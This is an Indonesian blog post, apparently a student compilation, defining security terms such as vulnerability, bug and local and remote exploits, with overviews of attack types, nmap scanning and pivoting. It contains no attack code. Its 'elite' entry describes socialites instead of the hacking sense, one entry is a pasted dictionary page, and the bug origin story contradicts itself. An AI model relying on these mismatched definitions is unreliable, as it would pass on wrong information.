Selasa, 17 Mei 2016

Pengertian Elite, Vulnerable, Security hole, Bug, Exploit (Local, Remote), Logical Bomb, Penetration testing



Ø  ELITE

Sosialite adalah seseorang atau sekelompok orang yang selalu berpartisipasi dalam aktivitas sosial dan menghabiskan waktu untuk menghibur dan dihibur pada acara-acara mode kelas atas. Menurut Merriam-Webster kalimat sosialite pertama kali digunakan pada tahun 1928. Menurut dua orang penulis buku, sosialita didefinisikan sebagai seseorang yang aktif bersosialisasi.

Etimologi

Sosialite adalah sebuah akronim yang diserap dari bahasa Inggris, berasal dari kalimat sosial dan elite. Kata "sosial" sebagai kata sifat memiliki arti :
·         Suka memperhatikan kepentingan umum (suka menolong, menderma, dan sebagainya),
·         Berkenaan dengan masyarakat,
Sedangkan "elite" sebagai kata benda memiliki arti:
·         Orang-orang terbaik atau pilihan di suatu kelompok,
·         Kelompok kecil orang-orang terpandang atau berderajat tinggi (kaum bangsawan, cendekiawan, dan sebagainya).
Secara bahasa atau makna aslinya, para kaum "sosialita" adalah sebagai orang-orang yang memiliki derajat tinggi atau terpandang, dan mereka memiliki jiwa sosial terhadap orang-orang yang kurang mampu. Kemudian makna kata sosialita di Indonesia terjadi pergeseran makna yang sangat berbeda dengan makna aslinya.

Kehidupan sosialita

Jika dikaitkan dengan defini diatas, pengertian sosialita telah mengalami pergeseran makna. Sekarang arti kata sosialita dikaitkan dengan kehidupan mewah, glamour dan menghabis-habiskan uang. Perbedaan makna tersebut membuat sosialita dipandang sebelah mata, hal ini karena gaya hidup yang dijalani sebatas untuk mendapatkan pengakuan atas kekayaannya, untuk membangun citra diri semu. Kalangan yang fokus pada lifestyle dan mengabaikan wealthstyle. Gaya hidup tak sesuai kemampuan kemudian mendorong mereka cenderung mengambil jalan pintas dengan menghalalkan segala cara. Mereka ingin merasakan kenyamanan yang semu. Kalangan ini tak mampu hidup dalam ketidaknyamanan dan menjadi manusia yang tak bertumbuh. Sehingga yang ada di pikiran hanya sebatas tas mahal, sepatu mahal, arisan jutaaan rupiah, cafe, club, dan kemewahan.
Tentunya ini telah mendobrak citra sosialita, dimana Robert L. Peabody mendefinisikan sosialita sebagai seseorang yang berpartisipasi dalam aktivitas sosial dan menghabiskan sebagian banyak waktunya untuk menghibur sekaligus mendapatkan hiburan. Inilah aktifitas yang tidak dilakukan oleh orang kaya dalam menggunakan kekayaannya untuk mengadakan akitifitas sosial namun hanya arisan duit semata.


Ø  VULNERABLE

Terjemahan bahasa Inggris-bahasa Indonesia untuk "vulnerable" "vulnerable" Terjemahan bahasa Indonesia
Hasil: 1-9 dari 9
vulnerable {kata sifat}
vulnerable {kt sft}
rentan {kt sft}
Unfortunately, these seed banks are located around the world in buildings and they're vulnerable.
Sayangnya, bank benih ini terletak di dalam gedung-gedung di seluruh dunia dan rentan terhadap kerusakan.
What it takes to turn a person who is destitute and vulnerable into a slave, is the absence of the rule of law.
Yang diperlukan untuk mengubah orang yang rentan dan kekurangan menjadi budak adalah tidak adanya peraturan hukum.
There's a lot of vulnerable people out there.
Ada banyak orang yang rentan di sana.
But kids are more vulnerable to brain injury.
Namun anak-anak lebih rentan cedera.
He begins by explaining how science works through the testing of hypotheses that are framed to be vulnerable to disproof, and then he goes on.
Ia mulai dengan menjelaskan bagaimana sains bekerja melalui pengujian hipotesis yang dibentuk agar rentan terhadap bantahan, lalu ia melanjutkan.
vulnerable {kt sft} (juga: weak, feeble, flabby, flaccid)
lemah {kt sft}
vulnerable {kt sft}
mudah diserang {kt sft}
vulnerable {kt sft}
gampang terkena {kt sft}
vulnerable {kt sft}
tidak kebal {kt sft}
Contoh penggunaan untuk "vulnerable" di bahasa Indonesia
Kalimat ini berasal dari sumber eksternal dan mungkin tidak akurat. bab.la tidak bertanggung jawab atas isinya. Baca lebih lanjut disini.
What this demonstrates, I think, is how impressionable and vulnerable we are in the face of a story, particularly as children.
Menurut saya hal ini menggambarkan betapa mudah terpengaruh dan rapuhnya kita di hadapan suatu cerita, khususnya anak-anak.
What makes you feel vulnerable?"
Apa yang membuat anda merasa rapuh ?"
We live in a vulnerable world.
Ini adalah dunia dimana kita hidup.
The end goal will [be] becoming vulnerable, realizing the place of our connection to one another, rather than becoming secure, in control and alone.
Tujuan akhirnya akan menjadi rapuh, menyadari posisi dari hubungan kita satu sama lain, daripada menjadi aman, terkendali, dan sendirian.


Ø  SECURITY HOLE

Keamanan komputer atau dalam Bahasa Inggris computer security atau dikenal juga dengan sebutan cybersecurity atau IT security adalah keamanan informasi yang diaplikasikan kepada komputer dan jaringannya. Computer security atau keamanan komputer bertujuan membantu user agar dapat mencegah penipuan atau mendeteksi adanya usaha penipuan di sebuah sistem yang berbasis informasi. Informasinya sendiri memiliki arti non fisik.
Keamanan komputer adalah suatu cabang teknologi yang dikenal dengan nama keamanan informasi yang diterapkan pada komputer. Sasaran keamanan komputer antara lain adalah sebagai perlindungan informasi terhadap pencurian atau korupsi, atau pemeliharaan ketersediaan, seperti dijabarkan dalam kebijakan keamanan.
Sistem keamanan komputer merupakan sebuah upaya yang dilakukan untuk mengamankan kinerja dan proses komputer. Penerapan computer security dalam kehidupan sehari-hari berguna sebagai penjaga sumber daya sistem agar tidak digunakan, modifikasi, interupsi, dan diganggu oleh orang yang tidak berwenang. Keamanan bisa diindentifikasikan dalam masalah teknis, manajerial, legalitas, dan politis. computer security akan membahas 2 hal penting yaitu Ancaman/Threats dan Kelemahan sistem/vulnerabillity.
Keamanan komputer memberikan persyaratan terhadap komputer yang berbeda dari kebanyakan persyaratan sistem karena sering kali berbentuk pembatasan terhadap apa yang tidak boleh dilakukan komputer. Ini membuat keamanan komputer menjadi lebih menantang karena sudah cukup sulit untuk membuat program komputer melakukan segala apa yang sudah dirancang untuk dilakukan dengan benar. Persyaratan negatif juga sukar untuk dipenuhi dan membutuhkan pengujian mendalam untuk verifikasinya, yang tidak praktis bagi kebanyakan program komputer. Keamanan komputer memberikan strategi teknis untuk mengubah persyaratan negatif menjadi aturan positif yang dapat ditegakkan.
Pendekatan yang umum dilakukan untuk meningkatkan keamanan komputer antara lain adalah dengan membatasi akses fisik terhadap komputer, menerapkan mekanisme pada perangkat keras dan sistem operasi untuk keamanan komputer, serta membuat strategi pemrograman untuk menghasilkan program komputer yang dapat diandalkan.
Keamanan komputer (Computer Security) merupakan suatu cabang teknologi yang dikenal dengan nama keamanan informasi yang diterapkan pada komputer. Pengertian tentang keamanan komputer ini beragam-ragam, sebagai contoh dapat kita lihat beberapa defenisi keamanan komputer menurut para ahlinya, antara lain :
Menurut John D. Howard dalam bukunya “An Analysis of security incidents on the internet” menyatakan bahwa : “Keamanan komputer adalah tindakan pencegahan dari serangan pengguna komputer atau pengakses jaringan yang tidak bertanggung jawab”.
Menurut Gollmann pada tahun 1999 dalam bukunya “Computer Security” menyatakan bahwa : “Keamanan komputer adalah berhubungan dengan pencegahan diri dan deteksi terhadap tindakan pengganggu yang tidak dikenali dalam system komputer”.
Menurut Garfinkel dan Spafford, ahli dalam computer security, komputer dikatakan aman jika bisa diandalkan dan perangkat lunaknya bekerja sesuai dengan yang diharapkan. Keamanan komputer memiliki 5 tujuan, yaitu:
1.      Availability
2.      Integrity
3.      Control
4.      Audit
5.      Confidentiality
Tujuan Keamanan Komputer dalam CASIFO:
*       Perusahaan
Berusaha melindungi data dan informasi dari orang yang tidak berada dalam ruang lingkupnya.
*       Ketersediaan
Tujuan SIFO adalah menyediakan data dan informasi bagi mereka yang berwenang untuk menggunakannya.
*       Integritas
Semua subsistem SIFO harus menyediakan gambaran akurat dari sistem fisik yang di wakilinya.
Berdasarkan level, metode pengamanan komputer dibedakan berdasarkan level keamanan, dan disusun seperti piramida, yaitu:
1.        Keamanan Level 0, merupakan keamanan fisik (Physical Security) atau keamanan tingkat awal. Apabila keamanan fisik sudah terjaga maka keamanan di dalam computer juga akan terjaga.
2.        Keamanan Level 1, terdiri dari database security, data security, dan device security. Pertama dari pembuatan database dilihat apakah menggunakan aplikasi yang sudah diakui keamanannya. Selanjutnya adalah memperhatikan data security yaitu pendesainan database, karena pendesain database harus memikirkan kemungkinan keamanan dari database. Terakhir adalah device security yaitu adalah yang dipakai untuk keamanan dari database tersebut.
3.        Keamanan Level 2, yaitu keamanan dari segi keamanan jaringan. Keamanan ini sebagai tindak lanjut dari keamanan level 1.
4.        Keamanan Level 3, merupakan information security. Informasi – informasi seperti kata sandi yang dikirimkan kepada teman atau file – file yang penting, karena takut ada orang yang tidak sah mengetahui informasi tersebut.
5.        Keamanan Level 4, keamanan ini adalah keseluruhan dari keamanan level 1 sampai level 3. Apabila ada satu dari keamanan itu tidak terpenuhi maka keamanan level 4 juga tidak terpenuhi.

Berdasarkan sistem, metode pengamanan komputer terbagi dalam beberapa bagian antara lain :

*       Network Topology
Sebuah jaringan komputer dapat dibagi atas kelompok jaringan eksternal (Internet atau pihak luar) kelompok jaringan internal dan kelompok jaringan eksternal diantaranya disebut DeMilitarized Zone (DMZ). - Pihak luar : Hanya dapat berhubungan dengan host-host yang berada pada jaringan DMZ, sesuai dengan kebutuhan yang ada. - Host-host pada jaringan DMZ : Secara default dapat melakukan hubungan dengan host-host pada jaringan internal. Koneksi secara terbatas dapat dilakukan sesuai kebutuhan. - Host-host pada jaringan Internal : Host-host pada jaringan internal tidak dapat melakukan koneksi ke jaringan luar, melainkan melalui perantara host pada jaringan DMZ, sehingga pihak luar tidak mengetahui keberadaan host-host pada jaringan komputer internal.
Salah satu alat bantu yang dapat digunakan oleh pengelola jaringan komputer adalah Security Information Management (SIM). SIM berfungsi untuk menyediakan seluruh informasi yang terkait dengan pengamanan jaringan komputer secara terpusat. Pada perkembangannya SIM tidak hanya berfungsi untuk mengumpulkan data dari semua peralatan keamanan jaringan komputer tapi juga memiliki kemampuan untuk analisis data melalui teknik korelasi dan query data terbatas sehingga menghasilkan peringatan dan laporan yang lebih lengkap dari masing-masing serangan. Dengan menggunakan SIM, pengelola jaringan komputer dapat mengetahui secara efektif jika terjadi serangan dan dapat melakukan penanganan yang lebih terarah, sehingga organisasi keamanan jaringan komputer tersebut lebih terjamin.

*       IDS / IPS
*        
Intrusion detection system (IDS) dan Intrusion Prevention system (IPS) adalah sistem yang digunakan untuk mendeteksi dan melindungi sebuah sistem keamanan dari serangan pihak luar atau dalam. Pada IDS berbasiskan jaringan komputer , IDS akan menerima kopi paket yang ditujukan pada sebuah host untuk selanjutnya memeriksa paket-paket tersebut. Jika ditemukan paket yang berbahaya, maka IDS akan memberikan peringatan pada pengelola sistem. Karena paket yang diperiksa adalah salinan dari paket yang asli, maka jika ditemukan paket yang berbahaya maka paket tersebut akan tetap mancapai host yang ditujunya.Sebuah IPS bersifat lebih aktif daripada IDS. Bekerja sama dengan firewall, sebuah IPS dapat memberikan keputusan apakah sebuah paket dapat diterima atau tidak oleh sistem. Apabila IPS menemukan paket yang dikirimkan adalah paket berbahaya, maka IPS akan memberitahu firewall sistem untuk menolak paket data itu. Dalam membuat keputusan apakah sebuah paket data berbahaya atau tidak, IDS dan IPS dapat memnggunakan metode
*       Signature based Intrusion Detection System : Telah tersedia daftar signature yang dapat digunakan untuk menilai apakah paket yang dikirimkan berbahaya atau tidak.
*       Anomaly based Intrusion Detection System : Harus melakukan konfigurasi terhadap IDS dan IPS agar dapat mengetahui pola paket seperti apa saja yang akan ada pada sebuah sistem jaringan komputer. Paket anomaly adalah paket yang tidak sesuai dengan kebiasaan jaringan komputer tersebut.
*        
*       Port Scanning
*        
Metode Port Scanning biasanya digunakan oleh penyerang untuk mengetahui port apa saja yang terbuka dalam sebuah sistem jaringan komputer. Cara kerjanya dengan cara mengirimkan paket inisiasi koneksi ke setiap port yang sudah ditentukan sebelumnya. Jika port scanner menerima jawaban dari sebuah port, maka ada aplikasi yang sedang bekerja dan siap menerima koneksi pada port tersebut.

*       Packet Fingerprinting
*        
Dengan melakukan packet fingerprinting, kita dapat mengetahui peralatan apa saja yang ada dalam sebuah jaringan komputer. Hal ini sangat berguna terutama dalam sebuah organisasi besar di mana terdapat berbagai jenis peralatan jaringan komputer serta sistem operasi yang digunakan.

Jenis Ancaman jaringan


*       Probe
*        
Probe atau yang biasa disebut probing adalah usaha untuk mengakses sistem dan mendapatkan informasi tentang sistem

*       Scan
*        
Scan adalah probing dalam jumlah besar menggunakan suatu tool
*       Account compromise
Meliputi User compromize dan root compromize

*       Packet Snifer Adalah sebuah program yang menangkap data dari paket yang lewat di jaringan. (username, password, dan informasi penting lainnya)
*        
*       Hacking
*        
Hacking adalah tindakan memperoleh akses ke komputer atau jaringan komputer untuk mendapatkan atau mengubah informasi tanpa otorisasi yang sah
*       Denial-of-Service
Serangan Denial-of-service (DoS) mencegah pengguna yang sah dari penggunaan layanan ketika pelaku mendapatkan akses tanpa izin ke mesin atau data. Ini terjadi karena pelaku membanjiri jaringan dengan volume data yang besar atau sengaja menghabiskan sumber daya yang langka atau terbatas, seperti process control blocks atau koneksi jaringan yang tertunda. Atau mereka mengganggu komponen fisik jaringan atau memanipulasi data yang sedang dikirimkan, termasuk data terenkripsi.

*       Malicious code (Kode Berbahaya)
*        
Malicious code adalah program yang menyebabkan kerusakan sistem ketika dijalankan. Virus, worm dan Trojan horse merupakan jenis-jenis malicious code. - Virus komputer adalah sebuah program komputer atau kode program yang merusak sistem komputer dan data dengan mereplikasi dirinya sendiri melalui peng-copy-an ke program lain, boot sector komputer atau dokumen. - Worm adalah virus yang mereplikasi dirinya sendiri yang tidak mengubah file, tetapi ada di memory aktif, menggunakan bagian dari sistem operasi yang otomatis dan biasanya tidak terlihat bagi pengguna. Replikasi mereka yang tidak terkontrol memakan sumber daya sistem, melambatkan atau menghentikan proses lain. Biasanya hanya jika ini terjadi keberadaan worm diketahui. - Trojan horse adalah program yang sepertinya bermanfaat dan/atau tidak berbahaya tetapi sesungguhnya memiliki fungsi merusak seperti unloading hidden program atau command scripts yang membuat sistem rentan gangguan.
*       Social Engineering / Exploitation of Trust
Sekumpulan teknik untuk memanipulasi orang sehingga orang tersebut membocorkan informasi rahasia. Meskipun hal ini mirip dengan permainan kepercayaan atau penipuan sederhana, istilah ini mengacu kepada penipuan untuk mendapatkan informasi atau akses sistem komputer. Beberapa jebakan yang dapat dilakukan diantaranya dengan : - Memanfaatkan kepercayaan orang dalam bersosialisasi dengan komputer. - Memanfaatkan kesalahan orang secara manusiawi misal : kesalahan ketik dll - Bisa dengan cara membuat tampilan Login yang mirip (teknik fake login),
*       Phishing
Tindakan pemalsuan terhadap data atau identitas resmi.

Implementasi


Ada tiga macam Computer security yang berkaitan dengan kehidupan sehari-hari antara lain :
1. Keamanan eksternal / external security
Berkaitan dengan pengamanan fasilitas komputer dari penyusup dan bencana seperti kebakaran /kebanjiran.
2. Keamanan interface pemakai / user interface security
Berkaitan dengan indentifikasi pemakai sebelum pemakai diijinkan mengakses program dan data yang disimpan
3. Keamanan internal / internal security
Berkaitan dengan pengamanan beragam kendali yang dibangun pada perangkat keras dan sistem operasi yang menjamin operasi yang handal dan tak terkorupsi untuk menjaga integritas program dan data.
Dari berbagai macam jenis implementasi computer security ada hal yang perlu untuk diperhatikan dalam menjaga keamanan komputer. Di bawah ini adalah dua masalah penting di kehidupan sehari-hari yang harus diperhatikan dalam keamanan komputer :
*       Kehilangan data / data loss
Masalah data loss dapat disebabkan oleh :
*       Bencana
*       Kesalahan perangkat lunak dan perangkat keras
*       Kesalahan manusia / human error
*       Penyusup / intruder
Penyusup bisa dikategorikan kedalam dua jenis :
*       Penyusup pasif yaitu membaca data yang tidak terotorisasi ( tidak berhak mengakses )
*       Penyusup aktif yaitu mengubah susunan sistem data yang tidak terotorisasi.
Selain itu ancaman lain terhadap sistem keamanan komputer bisa dikategorikan dalam empat macam :

*       Interupsi / interuption
*        
Sumber daya sistem komputer dihancurkan sehingga tidak berfungsi. Contohnya penghancuran harddisk atau pemotongan kabel. Ini merupakan ancaman terhadap ketersediaan.

*       Intersepsi / interception
*        
Orang yang tak diotorisasi dapat masuk / mengakses ke sumber daya sistem. Contohnya menyalin file yang terotorisasi. Ini merupakan ancaman terhadap kerahasiaan.

*       Modifikasi / modification
*        
Orang yang tak diotorisasi tidak hanya dapat mengakses tapi juga mengubah,merusak sumber daya. Contohnya mengubah isi pesan, atau mengacak program. Ini merupakan ancaman terhadap integritas
*       Fabrikasi / fabrication
Orang yang tak diotorisasi menyisipkan objek palsu ke dalam sistem. Contohnya memasukkan pesan palsu, menambah data palsu. Dari kategori yang ada diatas dan jika dikaitkan dalam kehidupan sehari-hari pasti kita akan menemukan masalah dalam komputer.

Ancaman sistem keamanan komputer


Dibawah ini merupakan nama-nama ancaman yang sering dilihat dalam sistem keamanan komputer.
*       Adware
*       Backdoor Trojan
*       Bluejacking
*       Bluesnarfing
*       Boot Sector Viruses
*       Browser Hijackers
*       Chain Letters
*       Cookies
*       Dialers
*       Document Viruses
*       Email Viruses
*       Internet Worms
*       Mobile Phone Viruses
*        

Jenis Ancaman keamanan komputer


Berikut ini adalah contoh ancaman-ancaman yang sering dilihat :

*       Virus
*       Email Virus
*       Internet Worms
*       Spam
*       Trojan Horse
*       Spyware
*       Serangan Brute-force
*        

Manfaat


Guna manfaat sistem keamanan computer yaitu menjaga suatu sistem komputer dari pengaksesan seseorang yang tidak memiliki hak untuk mengakses sistem komputer tersebut. Sistem keamanan komputer semakin dibutuhkan saat ini seiring dengan meningkatnya penggunaan komputer di seluruh penjuru dunia. Selain itu makin meningkatnya para pengguna yang menghubungkan jaringan LANnya ke internet, namun tidak di imbangi dengan SDM yang dapat menjaga keamanan data dan infomasi yang dimiliki. Sehingga keamanan data yang ada menjadi terancam untuk diakses dari orang-orang yang tidak berhak. Keamanan komputer menjadi penting karena ini terkait dengan Privacy, Integrity, Autentication, Confidentiality dan Availability. Beberapa ancaman keamanan komputer adalah virus, worm, trojan, spam dan lain-lain. Masing-masingnya memiliki cara untuk mencuri data bahkan merusak sistem komputer. Ancaman bagi keamanan sistem komputer ini tidak dapat dihilangkan begitu saja, namun kita dapat meminimalkan hal ini dengan menggunakan software keamanan sistem diantaranya antivirus, antispam dan sebagainya.

Faktor


Beberapa hal yang menjadikan kejahatan komputer terus terjadi dan cenderung meningkat adalah sebagai berikut :
*       Meningkatnya penggunaan komputer dan internet.
*       Banyaknya software yang pada awalnya digunakan untuk melakukan audit sebuah system dengan cara mencari kelemahan dan celah yang mungkin disalahgunakan untuk melakukan scanning system orang lain.
*       Banyaknya software-software untuk melakukan penyusupan yang tersedia di Internet dan bisa di download secara gratis.
*       Meningkatnya kemampuan pengguna komputer dan internet.
*       Kurangnya hukum yang mengatur kejahatan komputer.
*       Semakin banyaknya perusahaan yang menghubungkan jaringan LAN mereka ke Internet.
*       Meningkatnya aplikasi bisnis yang menggunakan internet.
*       Banyaknya software yang mempunyai kelemahan (bugs).
*        

Dampak


Dampak negatif yang ditimbulkan dari penggunaan sistem keamanan komputer yaitu.
*       Menurunnya nilai transaksi melalui internet terhadap E-Commerse
*       Menurutnya tingkat kepercayaan dalam melakukan komunikasi dan transaksi melalui media online.
*       Merugikan secara moral dan materi bagi korban yang data-data pribadinya dimanipulasi.
Seperti juga masalah yang ada di Indonesia yang menurut saya bisa dijadikan salah satu contoh dampak negative dari penggunaan sistem keamanan komputer yaitu;
*       Pencurian dan penggunaan account Internet milik orang lain. Salah satu kesulitan dari sebuah ISP (Internet Service Provider) adalah adanya account pelanggan mereka yang “dicuri” dan digunakan secara tidak sah. Berbeda dengan pencurian yang dilakukan secara fisik, pencurian account cukup menangkap user id dan password saja. Hanya informasi yang dicuri. Sementara itu orang yang kecurian tidak merasakan hilangnya benda yang dicuri. Pencurian baru terasa efeknya jika informasi ini digunakan oleh yang tidak berhak. Akibat dari pencurian ini, pengguna dibebani biaya penggunaan account tersebut. Kasus ini banyak terjadi di ISP. Membajak situs web. Salah satu kegiatan yang sering dilakukan oleh cracker adalah mengubah halaman web, yang dikenal dengan istilah deface. Pembajakan dapat dilakukan dengan meng[eksploitasi lubang keamanan.
*       Probing dan port scanning. Salah satu langkah yang dilakukan cracker sebelum masuk ke server yang ditargetkan adalah melakukan pengintaian. Cara yang dilakukan adalah dengan melakukan port scanning atau probing untuk melihat servis-servis apa saja yang tersedia di server target. Sebagai contoh, hasil scanning dapat menunjukkan bahwa server target menjalankan program web server Apache, mai server Sendmail, dan seterusnya. Analogi hal ini dengan dunia nyata adalah dengan melihat-lihat apakah pintu rumah anda terkunci, merek kunci yang digunakan, jendela mana yang terbuka, apakah pagar terkunci menggunakan (firewall atau tidak) dan seterusnya. Yang bersangkutan memang belum melakukan kegiatan pencurian atau penyerangan, akan tetapi kegiatan yang dilakukan sudah mencurigakan.
Berbagai program yang digunakan untuk melakukan probing atau portscanning ini dapat diperoleh secara gratis di Internet. Salah satu program yang paling populer adalah nmap (untuk sistem yang berbasis UNIX, Linux) dan Superscan (untuk sistem yang berbasis Microsoft Windows). Selain mengidentifikasi port, nmap juga bahkan dapat mengidentifikasi jenis operating system yang digunakan.
*       Virus. Seperti halnya di tempat lain, virus komputer pun menyebar di Indonesia. Penyebaran umumnya dilakukan dengan menggunakan email. Seringkali orang yang sistem emailnya terkena virus tidak sadar akan hal ini. Virus ini kemudian dikirimkan ke tempat lain melalui emailnya.
*       Denial of Service (DoS) dan Distributed DoS (DDos) attack. DoS attack merupakan serangan yang bertujuan untuk melumpuhkan target (hang, crash) sehingga dia tidak dapat memberikan layanan. Serangan ini tidak melakukan pencurian, penyadapan, ataupun pemalsuan data. Akan tetapi dengan hilangnya layanan maka target tidak dapat memberikan servis sehingga ada kerugian finansial. Bayangkan bila seseorang dapat membuat ATM bank menjadi tidak berfungsi. Akibatnya nasabah bank tidak dapat melakukan transaksi dan bank (serta nasabah) dapat mengalami kerugian finansial. DoS attack dapat ditujukan kepada server (komputer) dan juga dapat ditargetkan kepada jaringan (menghabiskan bandwidth). Tools untuk melakukan hal ini banyak tersebar di Internet.


Ø  BUG

Kekutu (bahasa Inggris: bug), seranggaan atau galat/kesalahan program adalah suatu kesalahan desain pada suatu katras (perangkat keras) atau katnak (perangkat lunak) yang menyebabkan peralatan atau program itu tidak berfungsi semestinya. Kekutu umumnya ditemukan pada katnak, bukan katras.

Asal usul istilah

Pada tahun 1945, sewaktu ukuran komputer masih sebesar kamar, pihak militer Amerika Serikat menggunakan komputer yang bernama "Mark 1". Pada suatu hari, komputer tersebut tidak berfungsi dengan semestinya. Setelah komputer itu diperiksa ternyata ada suatu bagian katras yang terdapat bug (serangga). Setelah bug itu diangkat dari katras, komputer dapat berfungsi dengan baik. Maka semenjak itu, kata bug lekat pada dunia perkomputeran.

Kejadian kekutu yang terkenal

·         Y2K, yaitu kekutu yang berhubungan dengan kebiasaan banyak pemrogram yang menyimpan tahun dalam format 2 angka pada tahun 1980-an. Kebiasaan ini menimbulkan masalah saat mendekati tahun 2000, yaitu kesadaran bahwa tahun 2000 akan ditafsirkan sebagai tahun 1900.

Catatan

§   Pemadanan istilah dengan memanfaatkan awalan pembentuk kata benda ke-, yakni yang mempunyai sifat atau ciri (KBBI III).
§   Pemadanan istilah dengan memanfaatkan akhiran pembentuk kata benda -an, yakni sesuatu yang mempunyai sifat (KBBI II
§   Pencetus Istilah BUG untuk Pertama Kali
§   562
§   REACHES
§   Ahmad Oriza di Tokoh
§   Jan 16, 2016
§   Istilah BUG sering didengungkan saat program tidak berjalan sesuai keinginan atau bisa dibilang agak ngaco.
§   Saya klik tombol ekspor laporan kenapa baik baik saja ya? – Client
§   Bersyukur pak kalau tidak ada apa apa, semoga kita bisa segera launch produknya. – Developer
§   Ya, itu sepotong perbincangan client dan developer saat tidak ada bug.
§   Nah, pernah gak kita merenung sebentar, siapa sih pencetus istilah BUG? ya, sama sekali gak terfikir oleh kita. Karena waktu kita habis untuk memikirkan deadline skripsi atau deadline pekerjaan yang tinggal 3 hari lagi.
§   Pencetus istilah bug adalah Grace Brewster Murray Hopper. Grace Hopper juga merupakan tokoh yang mempopulerkan juga istilah Debugging. Seperti teman-teman tahu istilah debugging ini merupakan pekerjaan memperbaiki bug yang ada.
§   Grace adalah seorang Wanita Amerika kelahiran 1906. Beliau merupakan Computer Scientist. Grace mendapatkan gelar sarjananya dalam bidang matematika dan fisika di The Phi Beta Kappa. Kemudian menuntaskan pendidikan magister di Yale University pada tahun 1930. Beliau juga bekerja untuk US Navy dan berpangkat Rear Admiral.
§   Laksamana Laut Pencetus istilah bug, Grace Hopper
§   Istilah bug ditemukan Grace dan kawan kawan saat mengerjakan mesin MARK II, saat itu sistem tidak berjalan sesuai keinginan. Setelah diperiksa ternyata ada serangga yang terjebak dalam komponen komputer yang mengganggu jalannya sistem elektronika MARK II.  Dengan agak iseng kemudian serangga tersebut disingkirkan dan ditempelkan dalam buku catatan mereka.
§   Luar biasa! itulah yang ada di benak saya saat membaca Biografi beliau. Tak disangka Grace Hopper juga merupakan pencipta Compiler untuk pertama kali. Compiler tersebut dipakai untuk mesin UNIVAC.  UNIVAC kependekan dari Universal Automatic Computer, yang beberapa kali mengeluarkan beberapa versi, mulai dari Univac II sampai Univac 1108.
§   Tidak berhenti sampai disitu, pada tahun 1959 Grace Hopper bersama pemerintahan AS mengembangkan suatu bahasa pemrograman yang juga fenomenal dan sering sekali disebut oleh dosen saya di mata kuliah pemrograman, COBOL!  kependekan dari Common Business-Oriented Language. Bahasa pemrograman tersebut ditujukan untuk kepentingan bisnis. COBOL banyak menghasilkan program finance dan sistem administrasi untuk perusahaan dan pemerintahan.
§   COBOL buatan Grace Hopper dan kawan kawan juga disebut sebagai bahasa pemrograman generasi ketiga. Bersanding dengan bahasa pemrograman seperti Fortran dan ALGOL yang juga diperkenalkan pada tahun 1950an.
§   SI Neg. 83-14878. Date: na.
Credit: Unknown (Smithsonian Institution)
§   Kisah Grace memang luar biasa. Tidak salah jika beliau dinobatkan sebagai Ibu Pemrograman. Salah satu wanita yang sangat berperan di dunia teknologi.


Ø  EXPLOIT (LOCAL, REMOTE)

Exploit adalah sebuah kode yang menyerang keamanan_komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.
Memang ada badan peneliti yang bekerja sama dengan produsen perangkat lunak. Peneliti itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan kalau mereka menemukannya, mereka melaporkan hasil temuan ke produsen agar produsen dapat mengambil tindakan. Meskipun demikian, exploit kadang menjadi bagian dari suatu malware yang bertugas menyerang kerapuhan keamanan.
Klasifikasi
Ada beberapa metode untuk mengklasifikasi exploit. Yang paling umum adalah dengan melihat cara exploit membuat kontak dengan perangkat lunak yang rentan. Remote exploit (eksploit jarak jauh) bekerja melalui jaringan dan mengeksploitasi celah keamanan tanpa adanya akses terlebih dahulu ke sistem korban. Local exploit (eksploit lokal) mengharuskan adanya akses terlebih dahulu ke sistem yang rentan dan biasanya meningkatkan keleluasaan orang yang menjalankan exploit melebihi yang diberikan oleh administrator sistem. Exploit yang menyerang aplikasi klien juga ada, biasanya terdiri dari server-server yang dimodifikasi yang mengirimkan exploit jika diakses dengan aplikasi klien. Exploit yang menyerang aplikasi klien juga mungkin memerlukan beberapa interaksi dengan pengguna, dengan demikian dapat digunakan dalam kombinasi dengan metode social engineering. Ini adalah cara hacker masuk ke komputer dan situs web untuk mencuri data.
Klasifikasi lain adalah dengan tindakan terhadap sistem korban: unauthorized akses data, eksekusi kode sewenang-wenang, penolakan layanan.
Banyak exploit dirancang untuk memberikan akses tingkat-''superuser'' ke sistem komputer. Namun, namun mungkin juga menggunakan beberapa exploit, untuk mendapatkan akses tingkat rendah terlebih dahulu, kemudian meningkatkan hak akses berulang kali sampai mencapai root.
Biasanya exploit tunggal hanya dapat mengambil keuntungan dari satu celah keamanan software tertentu. Sering kali, setelah exploit diterbitkan, celah keamanan sistem diperbaiki melalui tambalan sehingga exploit tak berlaku lagi untuk perangkat lunak versi terbaru. Hal ini menjadi alasan mengapa beberapa blackhat hacker tidak mempublikasikan exploit mereka tetapi merahasiakannya untuk diri sendiri atau hacker lainnya. Exploit tersebut disebut sebagai 'exploit zero day' dan untuk mendapatkan akses ke exploit tersebut adalah keinginan utama dari penyerang-penyerang amatir, yang sering dijuluki script kiddie
Jenis
Exploit pada umumnya dikategorikan dan dinamai berdasarkan kriteria berikut:
·         Jenis celah keamanan yang mereka eksploitasi
·         Apakah mereka perlu dijalankan pada mesin yang sama dengan program yang memiliki celah (lokal) atau dapat dijalankan pada satu mesin berbeda untuk menyerang program yang berjalan pada komputer lain (remote).
·         Hasil dari menjalankan exploit (EoP, DoS, Spoofing, dll)
Pivoting
Pivoting mengacu pada metode yang digunakan oleh penguji penetrasi yang menggunakan sistem yang telah dikuasai untuk menyerang sistem lain pada jaringan yang sama untuk menghindari larangan seperti konfigurasi firewall, yang dapat melarang akses langsung ke semua mesin. Sebagai contoh, seorang penyerang menguasai web server pada jaringan perusahaan, penyerang kemudian dapat menggunakan web server yang telah dikuasai untuk menyerang sistem lain pada jaringan. Jenis serangan ini sering disebut serangan multi-lapis. Pivoting juga dikenal sebagai island hopping.
Pivoting dapat dibedakan menjadi proxy pivoting dan VPN pivoting:
·         Proxy pivoting umumnya digambarkan sebagai tindakan menelusuri jalur melalui target yang dikuasai menggunakan proxy payload pada mesin dan meluncurkan serangan dari komputer ini. Jenis pivoting ini terbatas pada TCP dan UDP tertentu yang didukung oleh proxy.
